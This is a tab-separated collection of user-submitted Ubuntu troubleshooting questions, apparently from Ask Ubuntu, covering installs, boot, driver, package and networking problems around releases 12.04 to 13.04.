134213 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 17699 1 snd_hda_codec snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78921 20 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15048 1 snd snd_page_alloc 18485 2 snd_hda_intel , snd_pcm any ideas ?
257179	amarok does not recognize minidlna server	i have installed minidlna on a raspberrypi with an external hard drive . everything seems fine . playstation 3 recognizes the dlna service . but when i try to find it with amarok 2.5.0 on linux mint 13 maya ( precise ) there are no results . do i need any additional packages installed to activate dlna client support on my laptop ?
257182	unattended installation with ubuntu 12.10	in 11.10 and 12.04 times you could download alternate cds and create your own preseed files to automate the install . now with 12.10 that the alternate cd does not exist , i 'm wondering what are the choices ? the limitation i have is that everything has to be on cd/dvd/usb , so network installtion is out of question . any pointers ?
257183	wubi said files is missing after selecting uefi and csm	after installing ubuntu using wubi and selecting uefi and csm uefi as disabled in samsung series 5 with window 8 , wubi said files is missing . do i need to install with wubi again ? i read the answer , it said to use livecd , but i only hope not actual install in partition , only expect wubi in windows 8 , after read , it is quite terrible to install partition with livecd , it said choose anything you want during installation , but i already installed in window 8 already . why install again using livecd . finally it said it may not boot window 8 any more . is it possible to keep using window 8 boot manager to boot ubuntu ?
257184	system running in low graphics mode ?	when i try to start up ubuntu it is saying that my system is running in low graphics mode . it has n't happened before , i have been able to use it before until i deleted games and tried to start it up again when this error came up . i tried to use it is the low graphics mode and sign in , but it wont sign in . please help ! ! !
257185	ubuntu 12.10 no wifi access	i downloaded ubuntu 12.10 in my mac , but there are no wifi access in my ubuntu . my chip id is bcm4331 , and my pci-id is 14e4:4331 i tried to download firmware-b43-installer , but it said found unsupported device . how can i solve this problem ?
257186	wubi wo n't use my 64 bit desktop iso	i downloaded ubuntu-12.04.2-desktop-amd64.iso and wubi.exe from http : //releases.ubuntu.com/precise/ . i saved both the iso and wubi in the same folder . however , when i try to install ubuntu wubi starts downloading ubuntu again . but , if i place the 32 bit iso in the same folder with wubi , wubi detects it and starts installing the 32 bit version . but i want the 64 bit version because my computer has a 64 bit processor architecture ( intel i5 ) . please help me , i tried searching online but have found nothing . thank you very much .
257190	unable to install steam	ok so recently i logged into tf2 and saw that it supported linux . i 'll be completely honest with you , first i was in it for the little penguin but after installing linux i 'm actually starting to like it . the problem is i ca n't run steam . i ca n't even install it . i 've tried installing it through the software center and its failed horribly saying : package dependencies can not be resolved . this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . then i tried downloading the steam.latest.deb but when i ran it in the software center i get this : dependency is not satisfiable : libc6 ( > =2.15 ) so finally i attempted to install the .deb file through the terminal using this code : sudo dpkg -i steam_latest.deb and again i failed . after consulting with some friends who got it to work i entered suggested codes but all i 've gotten so far is this i 'll paste what my terminal says below if it helps . at this point i think i will uninstall ubuntu 12.10 and see if it works on 12.04 . anyway here 's the terminal : $ sudo dpkg -- add- architecture 1386 [ sudo ] password for bernardo : dpkg : error : unknown option -- add- $ sudo dpkg -i steam_latest.deb dpkg : error processing steam_latest.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : steam_latest.deb $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libcapi20-3 libgif4 libmpg123-0 libodbc1 libopenal-data libopenal1 linux-headers-3.5.0-17 linux-headers-3.5.0-17-generic odbcinst odbcinst1debian2 unixodbc wine-gecko1.4 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ cd /downloads bash : cd : /downloads : no such file or directory $ cd /downloads sudo dpkg -i steam_latest.deb bash : cd : /downloads : no such file or directory $ sudo dpkg -i steam_latest.deb dpkg : error processing steam_latest.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : steam_latest.deb
257192	skype does not see logitech pro 9000 - ubuntu 12.04	this camera works fine with cheese , but while it appears as the usb device skype recognizes , there is no video shown . this post and others mention libv4l-0 . apt-get install libv4l-0 reports that the latest version is already installed . the closest i can find to what is mentioned in that post are : /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so and /usr/lib/x86_64-linux-gnu/libv4l1.so.0 in both cases when i try to ld_preload these i get something like object '/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored and skype still does not see the camera correctly . what am i missing ? thanks
257193	gl_ext_texture_compression_s3tc error when opening a steam game	so i was trying to play team fortress 2 when this message appears : error ! required opengl extension `` gl_ext_texture_compression_s3tc '' is not supported . please install s3tc texture support . running on virtualbox , ubuntu 12.04.1 , intel 3550 , asus p8z77 v lx and radeon hd 7750 . 12mb of video memory dedicated to ubuntu on virtualbox .
257197	is there a way i can get the time since my comptuer last booted ?	is there a log file i can see or command i can issue that will tell me how long my computer has been running since last time i booted or logged in under my account ? i 'm on ubuntu 12.10 .
257198	need to wipe hard drive ubuntu 12.10 to put windows	my dad had a blank hard drive on which i installed ubuntu because it was easier than getting windows . some wifi drivers will not install . my dad only uses it for email , craiglist , and chat on facebook , so he does n't care what os he has as long as he can go online . i have the xp disk . when i type sudo fdisk -l in the terminal i get /dev/sda1 * 2048 114300927 57149440 83 linux /dev/sda2 114302974 117229567 1463297 5 extended /dev/sda5 114302976 117229567 1463296 82 linux swap / solaris then i type sudo dd if=/dev/zero of=device bs=1m and nothing happens . how do i wipe the whole hard drive ?
257200	unable to add or remove applications in ubuntu software center	i am trying to add or remove applications from ubuntu software center but ending up with the following error software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.74 ' } ) : org.debian.apt.install-or-remove-packages apt-get install or apt-get remove works good from command line , but does n't in usc any help ? ? ?
257206	what should i do if i `` installed '' ubuntu instead of just `` trying '' it ?	help ! i 'm brand new to ubuntu and need some hand holding . i just created a live cd of ubuntu and installed version 12.10 when i think i may have been better off just trying it : ( i started my ubuntu journey after reading a post that touted its diagnostics ( lifehacker.com/5551188/best-computer-diagnostic-tools ) . i 'm hoping to get a critical look under the covers of my desktop pc ( gigabyte mb , amd phenom ii x4 965 processor , 4gb ram ) . some apps ( google and itunes ) are incredibly slow to start , and although i 've confirmed with a separate iso boot cd of memtest-86 that my ram is error-free , i 'm looking to learn more about this machine and why it might be running slow . now that ubuntu is installed i think i need to retrace my steps , and i would like to know how to do so safely . i 'm not sure i 'm finding a lot of value in having another os on my machine when all i really wanted was some dependable and free diagnostics ... i 'm not a heavy enough user of xp to notice its flaws , and although ubuntu may be wonderful ( and free thanks to the selfless efforts of many ) , it represents to me at best a learning curve with little payback if i boot to ubuntu , and at worst an annoyance in the form of having to bypass the ubuntu os at start-up in favor of windows xp ( when my wife starts using this machine that will freak her out ) . furthermore , i 'm gravely concerned that my partitioning activity during installation has somehow robbed me of otherwise usable space on my rather modest 200gb western digital drive . i did not know how to tell what the partitioning `` slider '' tool was going to do , e.g . how much would be allocated to ubuntu versus xp , so i just left it set at the values shown during the install dialog ( 122gb on the left , 63gb on the right ) , hoping and thinking that the installer would automatically apportion modestly . now my drive has only 63gb of usable space with the other 122gb used for something , which i suspect is ubuntu ) . so i 'm looking for some wisdom in the following areas : 1 ) does ubuntu give the ability to critically evaluate ( other than memtest ) the condition of hardware as well as the overall health of a system ( registry , etc etc ) , enabling one to intelligently diagnose and correct performance issues ? if so , are these tools/utilities available without installing ubuntu ( e.g . to those `` trying '' it ) ? 2 ) is there a way to safely uninstall ubuntu , returning the system to windows xp only ? 3 ) if there a way ( either with or without uninstalling ubuntu ) to optimize the partition sizes of my disk , to allow for maximum availability to windows xp ( with a modest amount allocated to ubuntu should i choose to leave it installed ) ? currently i have 122gb used and i can say with almost 100 % certainty that my sparsely populated machine is naturally consuming nowhere near that amount of data ... rather , i believe i `` clobbered '' this storage during my partitioning activity during the install . 4 ) if i choose ( or am forced for practical reasons ) to leave ubuntu installed , is there a way to default to windows xp at boot instead of to ubuntu , if no keys are depressed within the allotted timeframe ? thanks to all who offer me advice ! ! dennis
257209	bind9 - openssl problem	when i try to start bind9 ; simply fail because of chroot & openssl /etc/init.d/bind9 start log messages ; feb 17 08:26:27 istvs2024 named [ 2440 ] : initializing dst : openssl failure feb 17 08:26:27 istvs2024 named [ 2440 ] : exiting ( due to fatal error ) feb 17 08:26:27 istvs2024 kernel : [ 92.091098 ] type=1400 audit ( 1361082387.173:14 ) : apparmor= '' denied '' operation= '' file_mmap '' parent=2439 profile= '' /usr/sbin/named '' name= '' /var/named/run-root/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so '' pid=2440 comm= '' named '' requested_mask= '' m '' denied_mask= '' m '' fsuid=108 ouid=0 if i didnt miss a point apparmor denies it ; my usr.sbin.named file already contains these lines : /var/named/run-root/** rw , /var/named/run-root/usr/** rw , also i can confirm that this file ; /var/named/run-root/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so exist in filesystem . literally , i 'm stuck , what other options i have , to fix this issue ? maybe , removing apparmor completely is a solution , but i didnt wan na do that
257213	boot dvd not recognized on desktop - sony vaio	i have a working windows xp sony vaio desktop on which i wanted to install ubuntu 12.10 using dvd on an available partition . i created the dvd from iso and made sure the boot order is correct in bios . the ubuntu dvd is not recognized by the computer and doesnt boot or install . i used the same dvd on another two machines ( desktop and a laptop ) running vista and windows 7 , it does boot and asks me to install . however , on this sony vaio desktop it doesnt boot . i tried windows installer and it works but very slow , and sometimes hangs and i dont want to use a virtual drive and run on windows , i would prefer to run ubuntu on a native partition on this machine . while in xp , the dvd shows as blank . when checked on windows 7 the same dvd shows up all install files of ubuntu . is there a solution for this at all ? the bioes does not allow to boot with usb drive for me to try that .
257216	change keyboard `` shortcuts ''	so when i was on windows i could do ctrl + alt + 2 ( `` ) to put an @ or ctrl + alt + 1 ( ! ) ( the one next to the key under esc ) to do the | . now i ca n't do it anymore . how can i change the `` shortcuts '' ?
257220	online accounts in ubuntu 12.10 not connecting	i added my facebook and google accounts to ubuntu online accounts recently but i keep getting the message `` connection to example @ gmail.com failed no reason specified . '' im not able to connect to any of my accounts using the online accounts . but my pidgin account which dosent use the online accounts works fine .
257223	how to get past grub prompt during boot ?	i am new to ubuntu and am stuck . please help as i do not know much about linux or command line . i am a windows 7 user . here are the steps i took to install ubuntu : i downloaded `` ubuntu-12.10-desktop-i386.iso '' file further via 7zip , extracted the ubuntu iso file in windows only . ran wubi.exe from the extract and installed ubuntu in e drive . c drive contains windows 7 and iso file was saved here only . wubi.exe downloaded some files for around an hour . the installation was successful and it asked for a reboot . i got a screen with some characters and after an hour or so i forced the shutdown . on reboot i got the option to select windows or ubuntu . on selecting ubuntu i get this and can not proceed further . gnu grub version 2.00-7ubuntu11 minimal bash-like line editing is supported . how do i get past this grub prompt ?
257225	how do i add a folder to sync . ?	i 've just recently installed u1 on ubuntu 12.04lts and i 've chosen 4 folders to synchronise with u1 . the system itself add another 2 = ubuntu one and thunderbird attachments . but i want to add a few more of my own folders , and that seems not to be possible . if i go to nautilus , right-click on a folder , choose ubuntuone -- synchronise this folder ... then nothing happens . why ?
257227	detecting corrupted files in ubuntu	i had windows7 on my hdd . when i tried to start my laptop it hangs at a blue screen after the starting windows screen . i then tried to reinstall windows with cd but the installation hangs too . finally , i installed ubuntu 12.04 on my hdd , but i want to install windows7 again . *question : * what is the command like chkdsk in windows to check the disk in ubuntu ? i can successfully mount my drives on hdd and can access few files . when i tried to copy the files on external drives there were errors like can not read files which i suspect to be the corrupted aim : to delete/recover files and reinstall windows also will this help ? i also did this bhavik @ bhavik-studio-1558 : ~ $ ntfsfix -b -d /dev/sda1 mounting volume ... error opening '/dev/sda1 ' : permission denied failed attempting to correct errors ... error opening '/dev/sda1 ' : permission denied failed failed to startup volume : permission denied error opening '/dev/sda1 ' : permission denied volume is corrupt . you should run chkdsk . bhavik @ bhavik-studio-1558 : ~ $ bhavik @ bhavik-studio-1558 : ~ $ update : according the the comment and the answer i ran the command sudo ntfsfix -b -d /dev/sda4 and the output is bhavik @ bhavik-studio-1558 : ~ $ sudo ntfsfix -b -d /dev/sda4 mounting volume ... ntfs signature is missing . failed attempting to correct errors ... ntfs signature is missing . failed failed to startup volume : invalid argument ntfs signature is missing . trying the alternate boot sector unrecoverable error volume is corrupt . you should run chkdsk . bhavik @ bhavik-studio-1558 : ~ $ sudo ntfsfix -b -d /dev/sda5 mounting volume ... ntfs signature is missing . failed attempting to correct errors ... ntfs signature is missing . failed failed to startup volume : invalid argument ntfs signature is missing . trying the alternate boot sector the alternate bootsector is usable set sector count to 8097791 instead of 771969023 rewriting the bootsector the boot sector has been rewritten ntfs_mst_post_read_fixup_warn : magic : 0x79930316 size : 1024 usa_ofs : 51168 usa_count : 510 : invalid argument record 0 has no file magic ( 0x79930316 ) failed to load $ mft : input/output error volume is corrupt . you should run chkdsk . bhavik @ bhavik-studio-1558 : ~ $ how do i uncorrupt the disk ? i am thinking of formatting it using a partition manager . is there any other way ?
257230	mouse clicks not work properly	the mouse will work fine for the most part on the top and side bar but as soon as i open up anything the mouse wo n't click on anything . i can still move the move around , but can not click on anything . i 've been searching for a solution but it seems like a lot of people have this problem but also seems like there is no solution . anyone ?
257233	unable to sync to ubuntu one with non-sudo user ?	my computer is running under ubuntu 10.04 lts and i use ubuntu one in order to sync my data . all this stuff work fine with my main account ( which is , by the way , part of the sudo users group ) . on the other hand , i ca n't use ubuntu one on another user of my computer ( not part of the sudo users group ) . here is the result of u1sdtool -- status with this second user session : state : ready connection : not user with network description : ready to connect is_connected : false is_error : false is_online : false queues : working_on_metadata when i try to open the ubuntu one client gui , i 'm asked a password to unlock a keyring ( which is impossible since this user is not sudo user , right ? ) . i need a hand on this one , please ... thanks !
257235	12.10 suddenly bricked luks ssd	there is luks-encrypted instance , no raid , no lvm . i often look through logs and that allows me to state that everything worked fine until reboot . however , laptop had ~3 days uptime . the drive is ssd with about 40 % space free , worked without issues for 7 months , fstrimmed manually every ~2 days . swap was never mounted , commented out a while ago in crypttab , initramfs rebuilt , not the case . after reboot : cryptsetup : evms_activate is not available begin : waiting for encrypted source device ... ... i had no clue what could cause the situation so i decided to go live in attempt to mount it eventually and extract the data or fix things using chroot environment , but i ended up with this ( screenshot taken from-under live session ) : https : //launchpadlibrarian.net/131458632/screenshot % 20from % 202013-02-17 % 2004 % 3a29 % 3a55.png so i ca n't mount it . initramfs environment shows the same . initramfs was n't rebuilt , no kernel updates were made , nothing related to mounting was touched . if it is dead , why gparted is able to recognize the table ? where is drive 's uuid ( live usb/initramfs it used to work with ) ? my options ? ( tried on different boxes , newer kernels ) any guesses what went wrong in general ?
257236	unable to boot windows 7 after ubuntu 12.10 update	i have a dell vostro 3360 with 500gb+32gb ssd and i 've installed dual boot windows 7/ubuntu 12.10 . everything worked fine till i upgraded the kernel version as i noticed that windows 7 from grub menu disappeared . i 've tried several ways and hours to solve it but , i can not make windows 7 boot again . boot-repair ( from ubunutu or livecd ) did n't solve the issue as it seems it does n't see the windows installation . here it is the pastebin : http : //paste.ubuntu.com/1669486/ i even added manually the entries using grub customizer to boot directly from /sda3 , but the error returned is `` bootmngr is missing '' . using a windows 7 recovery disk , the startup recovery option does n't solve anything . also , it does n't see the previous windows installation . the windows partition is already active ( marked as boot ) as i tried the solution from other posts . restoring mbr using boot-repair for the first time , i was able to resume windows ( hibernation ) , but after shutdown i was no more able to boot in windows . in that case , i think the intel rapid start it was used as it for hibernation . thus , i 'm pretty sure that this technology is messing up the grub and booting as boot-repair reports : ============================= boot info summary : =============================== = > grub2 ( v2.00 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos5 ) /boot/grub . = > windows 7/8/2012 is installed in the mbr of /dev/sdb . ( sdb is the 32gb ssd ) . as a last chance , i 've even tried restoring the dell factory image , but besides wiping my windows , it did n't help at all . right now , i am out of solutions . if somebody has other ideas to try , it will be much appreciated . thank you !
257237	i always get `` no such file or directory : apache2 : could not open error log file /etc/apache2/ $ apache_log_dir /error.log '' how cat i fix this	i am using ubuntu studio 12.04 and when i am trying to start apache2 , i get this error message : no such file or directory : apache2 : could not open error log file /etc/apache2/ $ apache_log_dir /error.log this meas , i should have a path like this /etc/apache2/var/log/apache2/ but in envvars the log dir is defined as /var/log/apache2 $ suffix not /etc/apache2/ how can i fix this .
257242	problems with openvpn	when i am trying to install openvpn on ubuntu 12.10 i get only problems . the config files are all empty and i only get error . when i have installed it for first time it was not empty config files . but i did something wrong so i had to apt-get purge openvpn and rm -rf /etc/openvpn/ . after that i have installed it again , then the real problems started . i ca n't finish the guide . i have used the ubuntuguide instructions for installingopenvpn_server and when i come to edit /etc/openvpn/server.conf : its nothing in there . what can i do ?
257248	how can i see how many processor cores are working ?	i have quad-core processor system . i was using windows before installing ubuntu . windows by-default was using 1 core* and i could change that with msconfig . how can i do this in ubuntu or is it necessary ? windows was using one core for booting .
257249	bash history not being preserved	this is a fresh install of ubuntu 12.10. i have n't even looked at the bashrc or profile files when i noticed that history would work fine for the current session . as soon as i closed the terminal , all history was gone my first reaction was to check some new default .bash_logout but there 's nothing there besides a line to clear the screen . i commented it out just to be sure . then i checked all the system wide bash settings , such as /etc/bashrc and still nothing . what may be happening here ? edit : ok , found the issue ... .bash_history was owned by root ! only on the user that i created during the install . will install on another box with the same image to rule out a bug or a mistake on my part after the install .
257254	got wireless connection one time , but then disconnected	wi-fi does not work in ubuntu but does work in windows vista . in ubuntu i clicked the network sign in the top right but enable wireless did n't not show up . then i decided to reinstall ubuntu , i check on install third-party program , and there was a wi-fi connection and i connected it . enable wireless showed up . but in the midway of the installation , it encountered a problem . then i tried to reinstall a few more times but there was no wi-fi . when i go to network sign in the top right , click edit connections > wireless* , it shows the wi-fi i have used , but enable wireless still does not show up . info : computer dell inspiron 1420 output of ifconfig -a : lien @ lien-inspiron-1420 : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:1e : c9:04 : cc:08 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:48 errors:0 dropped:0 overruns:0 frame:0 tx packets:48 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3808 ( 3.8 kb ) tx bytes:3808 ( 3.8 kb ) lien @ lien-inspiron-1420 : ~ $
257257	should i write over windows 8 efi	am dual booting ubuntu 12.04.2 and pre installed windows 8 . i do n't want to mess with the windows efi as i do n't have the disk and do n't know what will happen . i could not determin from https : //help.ubuntu.com/community/uefi and some other anwser what the policy is for the windows efi when installing ubuntu . do i have to re-due the whole partition or move it ? i shrunk man c partition and installed ubuntu if the free space but the efi already existed and was the 2nd partition in front of the ubuntu partition . i made an efi at the front of my ubuntu partition to see if it gave me an option to boot . the live disk did not recognize the windows operating system so i did manual install . it boots to widows although when i hit f12 i now have two choices on the hard drive but both boot windows .
257259	unable to workout zend server 6 with ubuntu 12.10	while installing zend server 6 as described here http : //files.zend.com/help/zend-server-6/zend-server.htm # deb_installing_zend_server.htm official manual of zend server installation it has two options : automatically installing it : i worked out this thing well but the final zend installation inside usr/local/zend/ did > not have zendctl.sh file and so i was n't able to run it manually installing it : i also worked this out well until i came on this command aptitude install zend-server-php-5.4 it gave me this error no candidate version found for zend-server 5.4 i have googled a lot to search for any solution but in vain . any help appreciated
257262	navigation betwen the 4 desktops of unity ?	i love unity so far . but since last update ( of what ? i do n't know . it happened after i restarted my pc ) , navigation between the 4 desktops has changed . i can still click on an app in the launcher to move to the desktop where the app is located ( which i love ) - but when arrived on this other desktop - unity shows me a 200px*100px map of all desktops for 1 sec ... which is pure visual pollution if you want my opinion . can i prevent unity from displaying this 'map ' when i slide from one desktop to another using the launcher icons ? also , i 'm searching for a list of key shortcuts to navigate between desktops if it exists ... thank you very much in advance . denisefromfrance
257263	how to display network traffic in terminal	how to display the actual network traffic ( wireless ) in a terminal ? additionally : is it possible to add this info to the chart of top ?
257266	make a live cd in a partition of my ehd ?	i have about 2gb unallocated space in my 1tb ehd . i want to put a live cd image on it ( and if possible , with persistence too ) . is this possible ? i do this before on smaller flash drives using dd but that replaces the partition table of the whole drive ( dd of=/dev/sdb ... ) but i only want it on a partition so i have no idea right now . thanks !
257267	first time install 13.04	i have been wanting to make the switch from windows to ubuntu for a while now and decided to do a test run by dual booting on my tower . i installed ubuntu 13.04 as it was the latest version and had no issues with the set-up . now that i have it installed i am having issues figuring things out . a main thing that is bugging me is i tried to set up eclipse using the adt package ( http : //developer.android.com/sdk/index.html ) . when it runs if i minimize the window disappears and the icon is not on the sidebar . another thing is there seems to be a problem with the software centre . when i go to see the currently installed applications , it shows a white screen with an unanimated loading circle in the middle and the cursor turns to the loading cursor . i guess my question would be is should i downgrade to ubuntu 12.10 and do my set-up there or just wait for the next update . also taking your recommendations if you think i should choose another linux distribution for android development .
257274	desktop does n't load	i installed ubuntu 12.10 yesterday and today when i try to login my desktop interface does n't load . i only see my wallpaper and my one icon ( steam ) on it , but i do n't see left/top taskbars . please help . my computer specs : proc : intel core 2 duo e8400 3ghz graphics : ati hd 6850 mainboard : asus p5k pro ram : 6gb
257278	how to solve my problems with booting ubuntu from external usb drive ?	my ubuntu does not want to boot up from an external usb drive . it only happens for my stationary pc though , while it runs nicely for my asus laptop . here goes the boot-repair : http : //paste.ubuntu.com/1670289/ if matters , the story of my problem solving is as follows : i have a 120 ssd drive ( only ) with windows and some games installed on my pc , and have really no option to put a wubi installation next to it ( no space obviously ) . so i decided to put ubuntu on my external drive ( 500gb in size ) , using wubi . it worked nicely , but after few days it did n't boot and dropped to busybox shell . for wrong reasons i decided i can not fix this ( maybe i could , do not matter now i guess ) , and tried to reinstall ubuntu once again . i 've read somewhere that wubi is supposed to install ubuntu inside windows installation , and if i want to put my ubuntu on the external drive , it is better to do it from liveusb . so i installed it like three or four times , each time following a different tutorial and getting same result . no booting from pc . once it stated that it lacks boot manager , whatever that might mean . tried to use boot-repair at this point , it processed for ages and stated that all should be fine now , but it ai n't . i guess that my system is now a real mess with grub configured for non-existing ubuntu instalation and external drive split into three non-usable partitions . and i have no much idea how to solve it anymore . i 'd be glad for any help , or at least a link to solid guide on how to get what i want . i am veteran on installing ubuntu now , though i 'd like to install it working at least once . cheers , magic
257279	why does my laptop boot to a black screen after installing all the updates ?	i have acer aspire one 722 and installed all the recent updates . however , after doing so my computer just boots to a black screen . i installed updates and when i hit restart it said `` unable to read files hit any button to continue '' . so i do so and it brings me to the screen where i select which os i want to run . i click the normal one which is linux 3.2.0-37-generic and then i just get a black screen .
257283	ubuntu 12.10 no sound from headphone on imac	i get sound from speakers but when i put headphones no sound coming . from system sound settings i check , and it is not muted .
257290	configure proxy for apt ?	i need to configure proxy . there was n't apt.conf file in etc/apt/ so i 've created it using nano . but i do n't understand what i need to write there . i 've written http_proxy = http : //lgn : pwd @ 192.168.1.254:8080/ there and then restarted networking . but when i try to apt-get update - it does n't work . actually i do n't understand what port and ip i should write in apt.conf file ( there was example with 192.168.1.254 ip and 8080 port so i decided to use them ) .
257297	can commercial applications use gsettings ?	according to specified technical requirements , a commercial application must be self‑contained in a single directory ( which i agree is a good requirement ) , and use ~/.config/ < app-name > for its configuration data ( good requirement too ) . however , gsettings requires to have a schema file installed inside of some subdirectory of $ xdg_data_dirs . do i have to understand commercial applications ca n't make use of gsettings ? update i 've found another page , which seems to suggest requirements are not exactly that restrictive . the latter mention installation of an icon file in /usr/share/icons/ and a desktop file in /usr/share/applications/ . if that 's ok , may be that 's ok too , to install a gsettings schema in /usr/share/glib-2.0/schemas/ ? that would still be better to have confirmation . i feel the first mentioned link , lacks precisions .
257300	windows phone 8 detected as mass storage	from version 8 onwards windows phone supports mtp ( media transfer protocol ) to transfer audio and i thought i could use rhythmbox to upload music onto my device . thing is rhythmbox does n't display the device under devices pane ( there 's no device pane for that matter ) . i searched other questions here and tried out installing mtp-tools , mtpfs and also tried gmtp , which does n't seem to detect the device as a portable player . i see that the device 's icon looks like a camera in dash bar and when i see the address location , it shows gphoto2 : // [ usb:002,013 ] / , which makes me doubt that it 's detected as a camera or as a mass storage device . /.gvfs/gphoto2 mount on usb % 3a002,003 is where the actual mount is . what do i do to fix this ? i tried creating .is_audio_player too .
257301	problem with installation and first login	i tried to install the ubuntu but had notice a problem twice and it will allow to get in to the desktop , but it appears the login to write a username and a password . i tried ignore it , put space , create a name , how can i login at first time ? it happens because there was a problem during the installation ? and how can i identify and solve this problem ? i followed all the steps , burned a dvd with the ubuntu system , boot the computer with the dvd , until the step to choose install or try ( i chose install ) .
257303	ubuntu software center does n't lauch/uninstall [ 12.10 ]	this cropped up somewhere during the process of installing an nvidia driver ( 310.32 ) for my graphic card . whenever i clicked on the ubuntu software center icon on the launcher , it seemed to work ( animation on icon to show that it was starting ) , and then nothing . so i did the first stupid thing , i tried to remove and reinstall the software center ; apparently , the remove did n't work properly , so i tried again . here 's the terminal session : parth @ gladoss : ~ $ sudo apt-get remove software-center reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : software-center 0 upgraded , 0 newly installed , 1 to remove and 304 not upgraded . 1 not fully installed or removed . after this operation , 4,485 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 176079 files and directories currently installed . ) removing software-center ... dpkg : error processing software-center ( -- remove ) : unable to securely remove '/usr/share/app-install/menu.d/featured.menu ' : not a directory no apport report written because maxreports is reached already errors were encountered while processing : software-center e : sub-process /usr/bin/dpkg returned an error code ( 1 ) parth @ gladoss : ~ $ let me know how i can properly remove and reinstall the program . thanks . edit : command sudo apt-get update comes to a stop with error message ( terminal ) w : gpg error : ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 4f191a5a8844c542 edit : tried the commands : ( i ) sudo rm /usr/share/app-install/menu.d/featured.menu result : directory does not exist . ( ii ) sudo rm -rf /usr/share/app-install/menu.d/featured.menu result : nothing . terminal just gets ready to accept new line . further , i tried `` sudo apt-get install software-center '' . same error message as original post . edit : sudo apt-get -- reinstall install software-center returns ( reading database ... 176080 files and directories currently installed . ) preparing to replace software-center 5.4.1.2 ( using ... /software-center_5.4.1.4_all.deb ) ... unpacking replacement software-center ... dpkg : error processing /var/cache/apt/archives/software-center_5.4.1.4_all.deb ( -- unpack ) : trying to overwrite '/usr/share/app-install/desktop ' , which is also in package app-install-data-partner 12.12.10 processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : /var/cache/apt/archives/software-center_5.4.1.4_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : i figured something was wrong with the dpkg , i googled that . some commands i tried afterwards . parth @ gladoss : ~ $ sudo dpkg -- audit the following packages are only half installed , due to problems during installation . the installation can probably be completed by retrying it ; the packages can be removed using dselect or dpkg -- remove : software-center utility for browsing , installing , and removing software parth @ gladoss : ~ $ sudo dpkg -- remove software-center ( reading database ... 176079 files and directories currently installed . ) removing software-center ... dpkg : error processing software-center ( -- remove ) : unable to securely remove '/usr/share/app-install/menu.d/featured.menu ' : not a directory errors were encountered while processing : software-center [ in succession ] edit : sudo dpkg -l software-center brings up a whole lot of files ; including /usr/share/app-install/menu.d/featured.menu if it 's being shown here , how is it that a recursive force remove ignores it ? are their any other commands ( not related to rm ) which might work ?
257306	ca n't install spotify for ubuntu 12.10	as the title says , i ca n't install spotify . i 've googled for answers but nothing was relevant to the case . another problem is that i ca n't install wine ( so i have to install spotify through terminal ) . i 've followed the instructions at spotifys web . but when i run /etc/apt/sources.list deb http : //repository.spotify.com stable non-free i got this : chucknorris @ ubuntu : ~ $ /etc/apt/sources.list bash : /etc/apt/sources.list : permission denied chucknorris @ ubuntu : ~ $ deb http : //repository.spotify.com stable non-free no command 'deb ' found , did you mean : command 'debc ' from package 'devscripts ' ( main ) command 'derb ' from package 'libicu-dev ' ( main ) command 'dab ' from package 'bsdgames ' ( universe ) command 'debi ' from package 'devscripts ' ( main ) command 'xdeb ' from package 'xdeb ' ( universe ) command 'dwb ' from package 'dwb ' ( universe ) deb : command not found chucknorris @ ubuntu : ~ $ so what should i do ? ps . i have reinstalled ubuntu a couple of times because of problems and the first ubuntu ( also 12.10 ) i was able to install it .
257307	missing operating system - ubuntu on usb	my hard drive died and so i decided to run ubuntu 12.04 from a usb . it ran flawlessly for a while , then suddenly it crashed and now when i start the laptop it says `` operating system not found '' . i do not have the hard drive in the laptop and i never did when i was running ubuntu . i have set to boot the usb key first in the bios and i have used the usb on other laptops and it works . i have an acer 5536g . i would be very happy if i can get any help . thanks
